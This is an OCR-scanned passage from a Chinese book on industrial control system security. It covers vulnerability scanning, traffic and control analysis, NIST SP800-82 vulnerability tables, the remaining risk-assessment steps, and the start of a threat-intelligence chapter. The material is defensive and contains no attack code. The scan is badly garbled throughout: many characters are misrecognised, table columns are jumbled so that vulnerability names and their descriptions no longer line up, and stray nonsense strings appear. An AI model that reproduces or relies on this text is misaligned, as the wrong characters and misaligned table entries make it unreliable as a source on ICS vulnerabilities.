控 系 统 渗透 测试 中 经 常 采用 的 做 法 ， 我 们 将 在 第 4 章 中 对 此 做 进一步 的 详细 讨论 。 


市 场 上 有 几 种 常见 的 漏洞 扫描 器 ， 包 括 (但 不 限于 ) Nessus、OpenVAS 和 Nexpose。 这 些 工具 的 使 用 非常 简单 ， 并 且 都 有 详细 的 说 明文 档 ， 对 它们 进行 详 
细 介 绍 超出 了 本 书 的 范畴 ， 因 此 不 再 榴 述 


(4) 实时 网 络 流量 分 析 


实时 网 络 流量 分 析 就 是 使 用 入 侵 检 测 系 统 (Intrusion Detection System, IDS) 或 安全 信息 与 事件 管理 工具 (Security Information and Event 
Management, SIEM) 被 动 地 监视 流量 并 对 其 进行 分 析 (实时 方式 或 离线 方式 ) 的 过 程 。 该 过 程 的 许多 准备 工作 开始 于 网 络 架 构 审查 与 数据 流 分 析 步 台 ， 并 且 
在 之 前 讨论 的 部 分 工具 的 使 用 过 程 中 也 都 提 到 过 。 本 步骤 重点 是 通过 分 析 网 络 拓扑 图 和 NetFlow 图 进而 识别 出 其 中 的 脆弱 性 。 


(5) 控制 分 析 


我 们 已 经 在 控制 分 析 (标准 审计 、 差 距 分 析 ) 步骤 中 讨论 了 这 种 方法 ， 但 是 由 于 许多 机 构 经 常 将 控制 分 析 作 为 整体 脆弱 性 评估 的 一 部 分 ， 因 此 在 这 里 有 必要 
重申 一 下 。 


正如 在 安全 策略 审查 步骤 中 所 提 到 的 ，NIST SP800-82 指 南 中 提供 了 几 个 针对 工控 系统 漏洞 的 非常 好 的 实例 ， 对 此 读者 应 该 予以 留意 ， 如 表 2-4 至 表 2-8 所 
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#2-4 NIST SP800-82 指 南 中 提出 的 架构 与 设计 中 的 脆弱 性 及 描述 


fe 55 性 描 R 


在 工控 系统 架构 搭建 、 设 计 过 程 中 融入 安全 性 考量 时 ， 必 须 从 工控 系统 的 预算 与 
在 架构 搭建 与 设计 过 程 | 时 间 进 度 的 安排 上 就 开始 考虑 安全 因素 。 安 全 架构 是 企业 架构 的 一 部 分 。 在 架构 设 
中 未 考虑 安全 因素 计时 要 能 够 解决 用 户 识别 与 授权 、 访 问 控制 机 制 实现 、 网 络 拓扑 绘制 、 系 统 配置 与 
完整 性 机 制 实现 等 问题 


工控 系统 中 的 网 络 基 础 设施 环境 通常 会 根据 业务 和 运营 要 求 进行 开 发 与 改动 ， 而 
几乎 没有 考虑 改动 所 市 来 的 浴 在 安全 影响 。 随 着 时 间 的 推移 ， 安 全 汤 洞 可 能 已 经 


icin 不 HR ER 

BEEN RNS | 意 中 带 入 到 了 基础 设施 中 的 特定 部 位 。 如 果 不 对 漏洞 进行 修复 ， 这 些 安全 漏洞 可 能 
会 成 为 进入 工控 系统 的 后 站 

eee 如 果 工 控 系统 没有 对 安全 边界 做 出 明确 定义 ， 则 无 法 确保 对 必要 的 安全 控制 进行 


了 正确 的 部 普 和 配置 。 这 可 能 导致 对 系统 与 数据 的 未 授权 访问 ， 以 及 其 他 很 多 问题 


对 于 控制 流量 和 非 控 制 流 量 而 言 具 有 不 同 的 要 求 ， 例 如 确定 性 和 可 徘 性 等 ， 因 此 

在 控制 网 络 中 传输 非 控 | 在 单一 网 络 中 如 采 同 时 具有 上 述 两 种 类 型 的 流量 ,那么 对 网 络 进 行 配置 以 满足 控制 

制 流量 流量 的 要 求 将 会 非常 困难 。 人 举例 来 说 ， 非 控制 流量 可 能 会 无 意 中 消耗 控制 流量 所 需 
要 的 资源 ， 从 而 导致 工控 系统 运行 中 断 


( 续 ) 
fe 弱 性 描 述 


在 控制 网 络 中 使 用 的 域名 解析 系统 协议 (Domain Name System, DNS) 和 动态 主 

在 控制 网 络 中 使 用 原先 | 机 配置 协议 (Dynamic Host Configuration Protocol, DHCP) 等 IT 服务 通常 在 IT 网 

未 在 控制 网 络 中 的 服务 络 中 实现 将 导致 工控 系统 网 络 依赖 于 IT 网络， 而 IT 网 络 并 不 具备 工控 系统 所 需要 

的 可 徘 性 与 可 用 性 

取证 分 析 取 决 于 是 否 收 集 并 保留 了 足够 的 数据 。 如 果 数 据 收集 的 方式 不 妥当 或 者 

事件 的 历史 数据 收集 不 | 不 正确 ， 则 可 能 无 法 确定 导致 发 生 安 全 事件 的 原因 。 而 如 果 事 件 被 忽视 ， 则 会 导致 

w 额外 的 损坏 和 (或 ) 系统 中 断 。 还 需要 开展 常规 安全 监控 ， 以 识别 安全 控制 的 问题 ， 
例如 错误 配置 和 故障 


表 2-5 NIST SP800-82 指 南 中 提出 的 配置 与 维护 中 的 脆弱 性 及 描述 


fe 35 性 


便 件 、 固 件 和 软件 缺乏 
配置 管理 


直到 发 现 源 洞 (甚至 发 
现 安全 汤 洞 很 和 之 后 )， 操 
作 系 统 和 软件 厂商 也 未 开 
发 出 安全 补丁 

未 对 操作 系统 和 应 用 程 
厅 安 全 补丁 进行 维护 管 
理 ， 或 者 厂商 拒绝 提供 补 
TI 


针对 安全 变更 的 测试 不 


ay e 
完善 


远程 访问 控制 机 制 薄弱 


配置 方式 不 完善 


未 对 关键 配置 信息 进行 
存储 或 备份 


未 对 便携 设备 中 的 数据 
予以 保护 


描 述 


机 构 并 不 知道 目 己 所 拥有 软 人 硬件 及 固件 的 数量 与 类 型 、 它 们 的 版 本 号 、 所 处 的 位 
置 以 及 补丁 状态 等 信息 ， 从 而 导致 了 不 一 致 并 且 无 效 的 防护 现状 。 应 实施 对 硬件 、 
固件 、 软 件 和 文档 等 对 象 的 控制 变更 管理 ， 以 确保 工控 系统 在 系统 变更 之 前 、 变 更 
期 间 和 变更 之 后 免 遭 不 当 或 者 不 正确 的 改动 影响 。 缺 乏 配 置 变更 管理 程序 可 能 导致 
对 安全 问题 失察 玩 忽 、 信 息 泄露 并 市 来 风险 。 为 了 对 工控 系统 实施 正确 的 保护 ， 应 
该 能 够 准确 地 列 出 系统 中 的 资产 及 其 当前 配置 。 配 置 变 更 管理 程序 对 于 确保 业务 连 
续 性 和 灾难 恢复 计划 的 有 效 实施 至 关 重 要 


由 于 工控 系统 软件 和 工控 系统 底层 之 间 的 紧密 看 合 ， 对 于 软件 的 改动 必须 经 历代 
价 高 郧 、 耗 时 其 多 的 全 面 回 归 测 试 。 而 对 更 新 后 的 软件 进行 测试 及 后 续 分 发 过 程 中 
的 耗 时 则 可 能 导致 工控 系统 在 一 段 相当 长 的 时 间 范 围 的 内 存在 油 洞 


过 时 的 操作 系统 和 应 用 程序 可 能 会 包含 新 发 现 的 可 利用 漏洞 。 应 当 为 安全 补丁 的 
维护 管理 过 程 制订 程序 并 形成 文档 。 对 于 使 用 过 时 操作 系统 的 工控 系统 ， 其 至 可 能 
没有 厂家 能 够 为 可 用 的 安全 补丁 提供 支持 。 因 此 ， 对 于 没有 可 用 补丁 的 情况 ， 在 处 
理 程 序 中 应 包含 与 之 对 应 的 漏洞 缓解 应 急 计 划 


对 于 已 部 蜀 硬 件 、 固 件 和 软件 的 改动 ， 如 果 未 对 其 进行 测试 ， 则 可 能 会 影响 工控 
系统 的 正常 运行 。 应 当 制 订 程 序 并 形成 文档 ， 保 证 对 可 能 市 来 安全 影响 的 所 有 改动 
进行 测试 。 不 能 针对 实时 业务 系统 开展 测试 。 针 对 系统 改动 的 测试 需要 与 系统 厂商 
和 集成 商 协调 进行 


远程 访问 工控 系统 的 原因 很 多 ， 无 论 是 厂商 与 系统 集成 商 需 要 执行 系统 维护 功 
能 ， 还 是 工控 系统 工程 师 需要 访问 位 于 地 理 上 不 同 地 方 的 远程 系统 组 件 ， 都 需要 对 
工控 系统 进行 还 程 访 问 。 对 于 远程 访问 能 力 必须 也 以 妥善 控制 ， 以 防止 针对 工控 系 
统 的 未 授权 个 人 访问 


配置 不 当 的 系统 中 会 开放 不 必要 的 端口 ， 用 到 不 必要 的 协议 。 而 不 必要 的 功能 则 
可 能 包含 脆弱 性 ， 从 而 增加 系统 所 面临 的 整体 风险 。 使 用 默认 配置 通常 会 导致 梭 露 
脆弱 性 以 及 存在 漏洞 的 服务 。 因 此 ， 应 该 对 所 有 设置 进行 仔细 检查 


对 于 发 生意 外 事件 或 者 攻击 者 复 改 配置 信息 的 情况 ， 应 制订 对 工控 系统 配置 信息 
进行 恢复 的 程序 ， 以 保持 系统 可 用 性 并 防止 数据 丢失 。 还 应 制订 对 工控 系统 配置 信 
奶 进 行 维护 的 程序 并 形成 文档 

如 果 敏 感 数 据 〈 例 如 ， 口 令 、 拨 号 号 码 等 ) 以 明文 形式 存储 在 诸如 笔记 本 电脑 和 
移动 设备 之 类 的 便携 式 设 备 中 ,那么 一 旦 这 些 设 备 丢 失 或 被 盗 就 可 能 危及 系统 安全 
性 。 因 此 ， 需 要 制订 相应 的 策略 、 程 序 与 机 制 对 便携 设备 中 的 数据 加 以 保护 


fe 55 性 


口令 的 生成 、 使 用 与 保 
AP [ra] Be = HE Hs AN — BE 


访问 控制 不 完善 


不 当 的 数据 连接 


未 安装 恶意 代码 防护 程 
序 或 者 未 对 恶意 代码 防护 
程序 进行 更 新 

未 对 恶意 代码 防护 程序 
进行 充分 测试 

拒绝 服务 攻击 (Denial of 
Service, DoS) 


Ay BE BE be BH BA A 
防御 软件 


日 志 维 护 缺 失 


未 授权 人 员 对 设备 的 物 
理 访问 


射频 、 电 磁 脉冲 、 静 电 
放电 、 电 压 不 足 和 电压 尖峰 


备用 电源 缺失 


( 续 ) 
描 R 


IT 环境 中 口令 使 用 的 大 量 经 验 同样 适用 于 工控 系统 。 必 须 切实 亲 循 口令 设置 策略 
和 程序 ， 这 些 策略 和 程序 才能 发 挥 作 用 。 而 违反 口令 策略 和 程序 则 会 大 幅 提 高 工控 
系统 的 脆弱 性 


访问 控制 必须 同 机 构 为 其 工作 人 员 分 配 职责 与 权限 的 方式 相 匹配 。 不 完善 的 访问 
控制 可 能 导致 为 工控 系统 用 户 赋 对 过 大 或 者 过 小 的 权限 。 以 下 分 别 举例 说 明 : 

O 采用 默认 访问 控制 设置 的 系统 会 赋予 操作 员 以 管理 员 权 限 ; 

J 配置 不 当 的 系统 会 导致 操作 员 在 紧急 情况 下 无 法 采取 纠正 措施 


工控 系统 数据 存储 系统 可 能 存在 与 非 工控 系统 数据 源 的 连接 。 其 中 一 个 例子 是 同 
数据 库 的 连接 ， 通 过 该 连接 ， 一 个 数据 库 中 的 数据 会 被 目 动 复 制 到 其 他 数据 库 。 而 
如 采 未 对 数据 链接 进行 正确 配置 ， 则 可 能 会 产生 漏洞 从 而 导致 数据 的 未 授权 访问 或 
操作 

恶意 代码 是 一 种 笛 见 的 攻击 形式 。 在 动态 环境 中 ， 恶 意 软件 防护 程序 (如 反 病 毒 
软件 ) 也 必须 时 刻 保持 更 新 。 过 期 的 恶意 软件 防护 程序 与 特征 库 会 导致 新 兴 恶 意 代 
码 对 系统 造成 威胁 


在 恶意 代码 防护 程序 未 经 充分 测试 的 情况 下 就 进行 部 蜀 可 能 影响 工控 系统 的 正常 
操作 ， 并 阻止 系统 执行 必要 的 控制 操作 


工控 系统 软件 极 另 遭受 DoS 攻击 ， 从 而 阻止 对 系统 资源 的 正常 授权 访问 ， 或 者 导 
致 系统 操作 与 运行 的 延 到 

攻击 事件 可 能 影响 系统 的 可 用 性 与 完整 性 ， 并 导致 数据 急 取 、 臭 改 和 删除 以 及 控 
制 命令 的 错误 执行 。IDS 或 IPS 软件 能 够 阻止 多 种 类 型 的 攻击 ,包括 DoS 攻击 ， 并 
且 能 够 识别 遭受 攻击 的 内 部 主机 ， 例 如 感染 蠕虫 的 主机 。IDS 或 IPS 软件 必须 在 部 
署 之 前 进行 测试 ， 以 确定 其 不 会 对 工控 系统 的 正常 运行 造成 影响 


如 采 未 采用 适当 的 方式 存储 准确 的 日 志 ， 则 难以 确定 导致 安全 事件 发 生 的 原因 
表 2-6 NIST SP800-82 指 南 中 提出 的 物理 环境 中 的 脆弱 性 及 描述 


fai R 


在 考虑 到 功能 安全 要 求 的 前 担 下， 如 紧急 关闭 或 重新 局 动 等 要 求 ， 对 工控 系统 设 
备 的 物理 访问 应 仅 限 于 必要 的 工作 人 员 。 对 工控 系统 设备 的 不 当 物 理 访问 可 能 会 导 
致 以 下 情 识 : 

Q 数据 和 硬件 的 失守 

J 效 据 和 硬件 的 物理 损坏 或 破坏 

Q 运行 环境 的 未 授权 变更 〈 例 如， 数据 连 接 、 可 移动 介质 的 未 授权 使 用 、 资 源 的 

添加 或 删除 ) 

J 物理 数据 链 路 连接 中 断 

Q 不 可 检测 的 数据 截获 ( 击 键 和 其 他 输入 记录 ) 


控制 系统 的 硬件 另 受 到 射频 、 电 磁 脉冲 、 静 电 放电 、 电 压 不 足以 及 电压 尖峰 的 影 
啊 。 受 影响 的 范围 涵盖 了 从 指挥 和 控制 系统 的 暂时 中 断 到 电路 板 的 永久 损坏 等 诸多 
后 果 。 建 议 采 用 适当 的 屏蔽 防护 措施 ， 例 如 接地 、 功 率 调节 以 及 (或 者 ) TM il 
等 保护 措施 


如 果 关 键 资 产 没有 备用 电源 ， 一 般 的 电力 中 断 事故 就 会 导致 工控 系统 关机 ， 并 可 
能 造成 其 他 危险 状况 。 电 力 中 断 还 可 能 导致 系统 恢复 到 不 安全 的 默认 设置 


fe 55 性 


环境 失控 


IS TA A hig O 


fe 55 性 
数据 验证 不 当 
默认 情况 下 未 局 用 已 安 
RAKEI RE 


软件 中 的 身份 认证 、 权 
限 分 配 和 访问 控制 不 完善 


fe 弱 性 
未 采用 数据 流 控 制 


未 部 署 防火 墙 或 防火 墙 
配置 不 当 


防火 墙 及 路 由 日 志 信 息 
记录 不 完善 


使 用 标准 的 、 有 具有 详细 
说 明文 档 的 通信 协议 ， 并 
且 通 信和 采用 明文 传输 

对 用 户 、 数 据 或 设备 的 


认证 过 程 不 符合 标准 或 者 
未 采用 号 份 认证 措施 


使 用 了 行业 中 不 安全 的 
工控 系统 协议 

通信 内 容 的 完整 性 检查 
机 制 缺 失 


无 线 客户 端 与 接 人 点 之 
间 的 认证 机 制 不 完善 


无 线 客户 端 与 接 入 点 之 
间 的 数据 保护 措施 不 完善 


Gs: 


大 多 数 中 、 高 级 网 络 安全 专家 都 能 够 完成 本 步骤 中 讨论 的 工作 。 但 是 对 于 工控 系统 环境 而 言 
多 评估 工具 与 评估 技术 都 可 能 对 这 些 敏感 系统 带 来 严重 的 不 利 影响 。 


描 
环境 失控 (例如 ， 温度 和 湿度 ) 可 能 会 导致 设备 损坏 〔〈 例 如， 处 理 需 过 热 )。 此 时 ， 
有 些 处 理 融 会 停止 工作 以 进行 自我 保护 ， 有 些 人 处理 兹 则 会 继续 以 最 小 电压 运行 ,但 
Jen] BET" E [a ESR TR 、 持 续 重 启 甚 至 永久 丧失 执行 能 力 
不 安全 的 USB 接口 和 了 PS/2 端口 可 能 会 导致 未 授权 的 连接 ， 例 如 小 型 U 盘 、 键 盘 
监控 程序 等 


IR 


表 2-7 NIST SP800-82 指 南 中 提出 的 软件 开发 过 程 中 的 脆弱 性 及 描述 


if 

工控 系统 软件 可 能 无 法 对 用 户 输 入 数据 或 接收 数据 进行 验证 以 确保 其 有 效 性 。 而 无 

效 数据 可 能 会 叶 致 多 种 汤 洞 ， 包 括 缓 存 区 溢出 、 命 令 注入 、 跨 站 脚本 和 路 径 裔 历 等 

随 产 品 一 起 安 角 的 安全 功能 如 有 果 未 经 局 用 或 至 少 确认 为 处 于 共用 状态 ， 那 么 这 些 
安全 功能 则 不 会 发 挥 任何 作用 


述 


对 组 态 和 编程 软件 的 未 授权 访问 可 能 会 损坏 设备 


表 2-8 NIST SP800-82 指 南 中 提出 的 通信 与 网 络 配置 中 的 脆弱 性 及 描述 


描 R 
应 当 采 用 基于 数据 特征 的 数据 流 控制 对 系统 之 间 传 输 的 信息 加 以 限制 。 数 据 流 控 
制 能 够 防止 信息 泄露 与 非法 操作 
配置 不 当 的 防火 墙 可 能 允许 不 必要 的 数据 进入 网 络 ， 例 如 控制 网 络 与 业务 网 络 ， 
从 而 造成 针对 内 部 网 络 的 攻击 和 恶意 代码 在 网 络 中 的 传播 ， 并 导致 敏感 数据 易 被 监 
视 和 和 家 取 ， 以 及 个 人 对 高 权限 系统 的 未 授权 访问 等 问题 


日 志 信息 记录 不 当 或 者 不 准确 ， 可 能 寻 致 无 法 确定 安全 事件 发 生 的 原因 


对 于 使 用 诸如 telnet、 文 件 传 输 协 议 (FTP)、 超 文本 传输 协议 (HTTP) 和 网 络 文 
件 系统 (NFS) 等 协议 进行 传输 的 数据 ， 攻 击 者 能 够 使 用 协议 分 析 顺 或 者 其 他 工具 
对 传输 的 数据 进行 解码 ， 以 实现 对 工控 系统 网 络 活 动 的 监控 。 使 用 上 述 协议 使 得 攻 
击 者 能 够 更 加 容易 地 对 工控 系统 发 起 攻击 并 操纵 工控 系统 网 络 行为 


许多 工控 系统 协议 在 各 个 层次 均 未 采用 认证 机 制 。 如 有 果 未 采用 认证 机 制 将 很 可 能 导 
怪 数 据 重 放 、 算 改 或 欺骗， 还 会 导致 设备 欺骗 ， 如 传 感 副 和 用 户 号 份 标识 得 等 设备 


工控 系统 协议 通常 只 有 很 少 的 或 者 完全 没有 安全 功能 (如 认证 、 加 密 等 )， 因 此 难 
以 保护 数据 免 遭 未 授权 访问 或 者 协议 数据 算 改 。 此 外 ， 协 议 在 实现 过 程 中 的 错误 也 
可 能 导致 其 他 漏洞 

在 大 多 数 工 业 控 制 协 议 中 均 未 内 置 数 据 完 整 性 检查 ， 攻 击 者 可 以 在 不 被 发 现 的 情 
况 下 操纵 通信 和 数据。 为 了 确保 完整 性 ， 工 控 系 统 可 以 使 用 提供 数据 完整 性 保护 功 和 有 
的 底层 协议 (如 IPsec 等 ) 

需要 在 无 线 客户 疾 和 接 入 点 之 间 采 用 强 相 互 认 证 ， 以 确保 客户 端 不 会 连接 到 攻击 
者 部 蜀 的 非法 接 入 点 ， 并 且 确 保 攻 击 者 无 法 连接 到 工控 系统 中 的 任何 无 线 网 络 


应 采用 强加 密 机 制 保护 无 线 客 户 端 和 接 人 点 之 间 传 输 的 敏感 数据 ， 确 保 攻击 者 无 
法 实现 对 未 加 密 数 据 的 未 授权 访问 


， 在 采取 安全 控制 措施 时 必须 具备 工业 系统 领域 的 经 验 ， 因 为 许 


2.2.3 “后续 步骤 


依据 到 目前 为 止 获得 的 所 有 信息 以 及 分 析 得 到 的 结果 ， 进 而 推测 得 出 的 所 有 内 容 ， 都 将 用 以 构建 真实 并 且 与 被 评估 系统 和 环境 直接 相关 的 风险 场景 。 为 了 实 
现 这 一 目标 ， 风 险 评估 过 程 接 下 来 的 步骤 所 涉及 的 内 容 通 常 称 之 为 威胁 建 模 。 如 前 所 述 ， 因 为 要 就 大 量 细节 展开 讨论 ， 威 胁 建 模 将 用 一 个 完整 的 章节 (第 3 章 ) 进 
行 介 绍 。 风 险 评估 过 程 的 其 余 步 骤 也 将 在 本 书 的 其 余部 分 中 进行 介绍 。 表 2-9 列 出 了 本 书 接 下 来 将 要 讨论 的 剩余 步骤 。 


表 2-9 ”本 书 接 下 来 将 要 讨论 的 工控 系统 风险 评估 剩余 步骤 
评估 步骤 编号 评估 步骤 摘 述 章 6 
He 55) HE DA -S ak Fh 3 
步骤 9 威胁 评估 第 3 章 


步骤 10 攻击 问 量 评估 第 3 章 

步骤 11 攻击 树 或 攻击 场景 构建 第 3 章 

步骤 12 吉 论 与 场景 验证 (渗透 测试 、CVSS) 第 4 一 7 章 
风险 计算 与 管理 

步骤 13 风险 计算 第 10 章 
步 又 14 优先 级 排序 及 缓解 措施 部 团 第 10 Be 
步骤 15 验证 缓解 措施 第 10 音 


2.3 本章 忆 结 


如 果 不 了 解 整体 风险 评估 过 程 的 相关 知识 ， 单 单 开展 渗透 测试 的 价值 将 会 大 大 减 小 ， 并 且 投 资 回报 率 也 会 变 得 不 确定 。 然 而 ， 作 为 整体 风险 评估 过 程 的 一 部 
分 ， 渗 透 测试 在 帮助 实现 高 效率 、 高 成 本 效益 的 风险 缓解 策略 制订 和 安全 控制 措施 部 署 方 面 友 挥 着 关键 作用 。 本 章 介 绍 了 工控 系统 风险 评估 过 程 ， 并 讨论 了 该 过 
程 的 前 8 个 步 又， 前 明了 工控 系统 渗透 测试 的 总 体 背 景 ， 并 且 对 开展 渗透 测试 的 各 个 步骤 提供 了 指导 。 


下 一 步 ， 我 们 将 继续 讨论 工控 系统 风险 评 佑 过程， 首先 从 威胁 建 模 步 骤 开 始 ， 然 后 是 工控 系统 渗透 测试 ， 最 后 探讨 工控 系统 风险 缓解 策略 ， 从 而 构成 整个 风 
险 评估 过 程 的 “闭环 ”。 
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Po ”通过 威胁 建 模 获取 具有 可 操作 性 的 工业 控制 系统 威胁 情报 


简单 来 说 ， 威 胁 情报 (threat intelligence) 融 是 有 天 潜在 威胁 的 信息 ， 这 些 潜在 威胁 不 仅 可 能 会 给 机 构 和 (或 ) 系统 市 来 风险 ， 并 且 已 经 以 能 够 给 机 构 市 来 
运 襄 价值 的 方式 完成 了 分 析 、 关 联 和 处 理 。 在 过 去 的 几 年 中 ， 威 胁 情报 已 经 逐渐 成 为 了 工控 系统 网 络 安全 领域 中 的 众多 热门 词汇 之 一 。 当 然 ， 我 们 现在 提 到 的 威 
胁 情 报 和 可 操作 的 威胁 情报 已 经 具有 了 更 多 “市 场 属性 ”。 不 过 说 句 公道 话 ， 放 在 一 个 涉及 方方面面 的 网 络 安全 项 目 中 来 看 ， 只 要 威胁 情报 的 内 容 准确 ， 并 且 对 
于 项 目 而 言 只 有 现实 意义 ( 稍 后 将 对 这 些 概念 进行 介绍 ) ， 其 实 威胁 情报 还 是 非常 重要 的 。 


但 老实 说 ， 情 报 与 可 操作 的 情报 之 间 又 有 什么 区 别 呢 ” 任何 威胁 情报 的 搜集 目的 都 是 为 了 在 现实 中 使 用 这 些 情 报 来 完成 某 些 事情 。 从 技术 上 来 说 ， 这 些 都 可 
以 看 作 是 可 操作 的 情报 。 关 键 在 于 ， 并 非 收 集 的 所 有 信息 对 于 机 构 或 系统 而 言 都 具有 现实 意义 ， 通 常 需要 对 这 些 信息 开展 进一步 分 析 才 能 够 找到 它们 与 机 构 或 者 
系统 之 间 的 关联 。 最 后 ， 可 操作 的 情报 才 会 转化 为 具有 现实 意义 的 情报 。 否 则 ， 威 胁 情报 真 的 就 只 是 一 个 流行 词汇 而 已 。 


那么 ， 既 具有 现实 意义 又 具有 可 操作 性 的 情报 是 由 哪些 内 容 构成 的 呢 ” 这 些 情报 又 是 如 何 获得 的 ， 应 当 如 何 使 用 呢 ? 虽然 很 多 机 构 都 试图 获取 工控 系统 威胁 
情报 ， 但 是 对 于 他 们 为 什么 需要 这 些 信息 、 如 何 才能 获取 高 质量 的 信息 ， 以 及 一 旦 这 些 信 息 (尤其 是 在 工控 系统 环境 中 ) 获取 了 之 后 又 能 够 拿 来 做 什么 用 等 问 
题 ， 这 些 机 构 并 不 十 分 理解 。 与 此 同时 ， 许 多 “威胁 情报 ”公司 和 三 商 只 是 贩卖 信息 并 将 其 标记 为 威胁 情报 ， 这 就 使 得 事情 变 得 更 加 复杂 。 威 胁 信息 与 威胁 情报 
之 间 是 存在 差异 的 。Robert M.Lee 在 SANS DFIR 网 站 上 发 表 的 一 篇 文章 (https://digital-forensics.sans.org/blog/2015/07/09/your-threat-feed-is-not- 
threat-intelligence) 能 够 帮助 解释 这 一 差异 。 在 这 篇 文章 中 ， 作 者 将 大 多 数 “威胁 情报 ”与 “迪士尼 人 物 ” 进 行 比 较 。 “大 多 数 是 神奇 的 、 化 了 妆 的 ，” 他 指 
出 ， 信 息 需 要 经 过 铝 干 阶段 分 析 ， 然 后 才 会 真正 成 为 情报 。 “只 有 理解 了 数据 、 信 息 以 及 情报 之 间 的 差异 ， 安 全 人 员 才 会 对 他 们 真正 应 该 找寻 的 内 容 做 出 明智 的 
判断 ， 从 而 帮助 解决 他 们 所 面临 的 问题 。” 他 接着 提 到 : 


“并 没有 类 似 于 威胁 情报 数据 之 类 的 东西 ， 也 没有 制造 情报 的 工具 ， 并 且 对 于 不 了 解 自身 运行 环境 就 贸然 对 威 腑 情报 进行 投入 的 机 构 而 言 ， 威 腑 情报 对 其 价 
值 是 有 限 的 。 但 是 ， 当 一 个 组 织 了 解数 据 、 信 息 和 情报 之 间 的 差异 ， 并 且 了 解 其 自身 所 处 的 运行 环境 时 ， 才 能 够 找 出 哪些 内 容 构 成 其 所 面临 的 威胁 ， 这 时 威胁 情 
报 将 为 安全 提供 极 大 的 助力 。 如 果 正 确 地 对 网 络 威胁 情报 并 加 以 运用 ， 我 坚信 它 能 够 发 挥 巨 大 的 作用 。” 


作者 在 DFIR 网 站 上 所 发 表 文章 的 基本 观点 在 于 ， 没 有 任何 工具 或 信息 来 源 能 够 提供 “威胁 情报 ”， 用 户 所 能 获得 的 只 有 信息 。 只 有 依靠 于 用 户 及 用 户 所 在 的 
机 构 ， 结 合 行业 背景 开展 相关 并 具有 针对 性 的 分 析 ， 才 能 使 得 “威胁 情报 ”具有 现实 意义 。 


rer 
~ 注意 


在 对 “可 操作 性 ”的 讨论 中 ， 一 个 不 应 该 忽略 的 概念 是 “易于 消化 吸收 性 ” (digestible) 。 如 果 机 构 获 取 的 信息 过 多 ， 则 难以 对 其 开展 有 效 、 成 功 的 分 析 ， 此 
时 可 操作 性 肯定 会 被 前 弱 。 


威胁 情报 本 身 融 是 一 个 可 以 为 之 投入 整个 职业 生涯 的 领域 ， 要 对 其 进行 全 面 的 介绍 ， 仪 仪 一 个 章节 肯定 是 不 够 的 。 本 章 将 主要 对 威胁 情报 的 作用 进行 概述 ， 
帮助 读者 理解 什么 是 威胁 情报 、 如 何 获取 威胁 情报 、 从 哪里 获取 威胁 情报 ， 以 及 如 何 将 威胁 情报 融合 到 一 个 工控 系统 网 络 安全 风险 管理 项 目 当 中 来 。 


3.1 威胁 信息 与 威胁 情报 


如 前 文 所 述 ， 威 胁 情 报 就 是 信息 。 但 威胁 情报 主要 是 关于 分 析 处 理 过 的 潜在 威胁 的 信息 ， 并 且 对 机 构 而 言 具有 运营 价值 。 典 型 的 威胁 信息 通常 由 威胁 源 (也 
被 称 为 威胁 代理 ，threat agent, ERRED, threat actor) 、 威 胁 源 的 动机 (motivations) 、 能 力 (capabilities) 以 及 活动 (activities) 组 成 ， 也 可 以 包 
括 威胁 源 感 兴 趣 的 目标 。 这 些 信息 单独 来 看 未 必 能 够 帮助 提高 入 侵 监 控 或 检测 能 力 、 加 强 安全 控制 部 署 ， 并 有 助 于 开展 其 他 安全 保障 措施 。 然 而 ， 一 旦 建立 起 这 
些 信息 同 用 户 系统 具体 内 容 之 间 的 关联 ， 那 么 其 运营 价值 将 逐渐 凸显 。 


举 个 例子 ， 假 设 收 到 信息 ， 针 对 用 户 所 在 工业 部 门 的 工控 系统 环境 会 友 起 一 次 恶意 代码 攻击 。 那 么 此 时 ， 用 户 惑 需要 对 存在 弱点 的 地 方 进行 反复 检查 并 加 强 
网 络 安全 控制 。 但 是 ， 从 哪里 开始 着 手 呢 ? 尤其 是 在 资源 有 限 的 情况 下 。 信 息 的 可 信 度 有 多 高 ”用户 确实 成 为 攻击 目标 的 可 能 性 又 有 多 大 呢 ? 


如 果 对 所 处 情况 不 了 解 ， 也 无 法 获取 针对 天 于 威胁 向 量 的 类 型 和 威胁 所 针对 的 脆弱 性 的 可 辨识 信息 ， 融 无 法 真正 确定 威胁 是 否 真 实 存 企 ， 缓 解 措施 (如 果 存 
在 的 话 ) 是 否 有 效 。 对 于 威胁 确实 存在 的 情况 ， 需 要 知道 攻击 的 友 起 方式 以 及 发 起 位 置 ， 以 便 了 解 如 何 部 署 最 佳 防御 措施 以 应 对 攻击 。 如 果 能 够 获取 更 多 有 关 该 
威胁 的 信息 ， 比 如 攻击 者 拟 采用 (或 者 是 最 有 可 能 采用 ) 的 威胁 向 量 与 漏洞 ， 并 县 知道 漏 洞 的 确切 位 置 ， 那 么 就 可 以 将 修复 工作 聚焦 于 其 友 挥 作用 最 大 的 地 方 

(如 果 资 源 有 限 ， 这 一 点 尤为 重要 ) 。 这 就 是 具有 现实 意义 的 可 操作 威胁 情报 ， 也 可 以 将 其 称 之 为 可 操作 的 战术 情报 (operational and tactical 


intelligence) 。 


当然 ， 这 个 例子 经 过 了 相当 程度 的 简化 。 收 集 并 分 析 得 到 准确 、 具 有 现实 意义 的 威胁 情报 的 过 程 耗 时 其 多 ， 并 且 非 常 复杂 。 这 也 是 在 网 络 安全 计划 中 经 常 忽 
视 并 (或 ) 琉 漏 威胁 情报 的 主要 原因 之 一 。 (如 前 所 述 ， 事 实 上 很 多 人 仍 未 真正 理解 威胁 情报 。) 大 多 数 机 构 的 威胁 情报 项 目 都 是 与 威胁 监控 项 目 (如 IDS 与 
SIEM 设 备 的 部 署 ) 一 起 开展 的 ， 但 是 在 这 两 个 项 目 中 各 自 的 整体 风险 评估 与 分 析 过 程 中 信息 仍然 是 分 离 的 (即便 “情报 ”是 最 重要 的 高 质量 信息 也 是 如 此 ) . 
望 这 个 示例 有 助 于 说 明 外 部 威胁 情报 应 该 如 何 同 内 部 态势 感知 项 目 协同 工作 ， 来 生成 在 实际 工作 中 具有 可 操作 性 的 威胁 情报 ， 其 中 内 部 感知 项 目 可 以 包括 脆弱 性 
评估 、 风 险 分 析 和 资产 管理 等 工作 。 


实际 情况 是 ， 当 主动 与 内 部 态势 感知 项 目 相 结合 ， 而 非 仪 仪 只 是 对 入 侵 检测 应 用 程序 等 设备 进行 被 动 响应 时 ， 威 胁 情 报 更 加 具有 现实 意义 同时 也 更 为 有 效 。 
